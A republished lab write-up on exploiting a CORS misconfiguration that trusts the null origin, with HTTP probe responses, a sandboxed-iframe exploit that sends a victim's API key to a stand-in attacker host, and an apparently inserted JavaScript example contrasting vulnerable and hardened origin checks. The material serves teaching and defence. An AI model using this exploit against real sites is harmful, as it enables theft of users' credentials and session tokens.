Portswigger’s lab write up: CORS vulnerability with trusted null origin

This content originally appeared on DEV Community 👩‍💻👨‍💻 and was authored by Christian Paez

In this apprentice-level lab, we will exploit a website with a CORS vulnerability that trusts the "null" origin to obtain a user's private credentials.

Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to /accountDetails that fetches the user's API key:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
  "sessions": [
    "cdmflpOO6psYIp3novWUytbSDM9i68X1"
  ]
}

We can see that Access-Control-Allow-Credentials: true is present. Let's duplicate this request, change the Origin header to something like Origin: https://example.com and see whether this value is reflected. The resulting response is something like this:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
  "sessions": [
    "cdmflpOO6psYIp3novWUytbSDM9i68X1"
  ]
}

The Origin set in the request headers is not reflected in an Access-Control-Allow-Origin response header, which could mean that the server is not vulnerable to CORS attacks for arbitrary origins. Some servers, however, whitelist the null origin, so let's try setting the Origin header to null:

HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
  "sessions": [
    "cdmflpOO6psYIp3novWUytbSDM9i68X1"
  ]
}

The null Origin set in the request headers is now reflected in the Access-Control-Allow-Origin response header alongside Access-Control-Allow-Credentials: true, which confirms that this request has a CORS vulnerability via the null origin. Let's use the reading material's sandboxed iframe template to craft our exploit so that the request is sent with the Origin header set to null:

<html>
<!-- A sandboxed iframe loaded from a data: URL has an opaque origin, so the browser sends Origin: null with the request -->
<iframe sandbox='allow-scripts allow-top-navigation allow-forms' src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
   location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
</html>
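To make the server-side mistake behind this lab concrete, here is an added example (not code from the post or from PortSwigger) showing the origin check that reflects null beside a hardened version, plus the header check the write-up performs by hand. The allowlisted origin `https://app.example` and the function names are assumptions.

```javascript
// Vulnerable: the allowlist contains "null" (constructed allowlist).
// Browsers send Origin: null for sandboxed iframes, data: URLs, file://
// pages and some cross-origin redirects, so "null" is not one trusted site:
// any attacker page can obtain it, which is exactly what the lab exploits.
function corsHeadersVulnerable(origin) {
  const trusted = ['https://app.example', 'null'];
  if (!origin || !trusted.includes(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened: exact match against concrete https origins only, "null" is
// rejected explicitly, and unmatched origins get no CORS headers at all.
// Vary: Origin keeps caches from serving one origin's answer to another.
function corsHeadersHardened(origin) {
  const trusted = new Set(['https://app.example']);
  if (!origin || origin === 'null' || !trusted.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// The test the write-up does with a repeated request: would a browser let
// a page at sentOrigin read this credentialed response? That requires the
// sent Origin to be echoed verbatim in ACAO together with ACAC: true.
function allowsCredentialedRead(headers, sentOrigin) {
  const acao = headers['Access-Control-Allow-Origin'];
  const acac = headers['Access-Control-Allow-Credentials'];
  return acac === 'true' && acao !== undefined && acao === sentOrigin;
}

// Walk through the three probes from the write-up against both servers.
function probeAll(handler) {
  return ['https://example.com', 'null', 'https://app.example'].map(
    (o) => [o, allowsCredentialedRead(handler(o), o)]
  );
}
```

`probeAll(corsHeadersVulnerable)` reports the null probe as readable, matching the lab, while `probeAll(corsHeadersHardened)` only admits the real allowlisted origin.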

Check out this write up on the Art Of Code: https://artofcode.tech/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin/
Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-trusted-null-origin
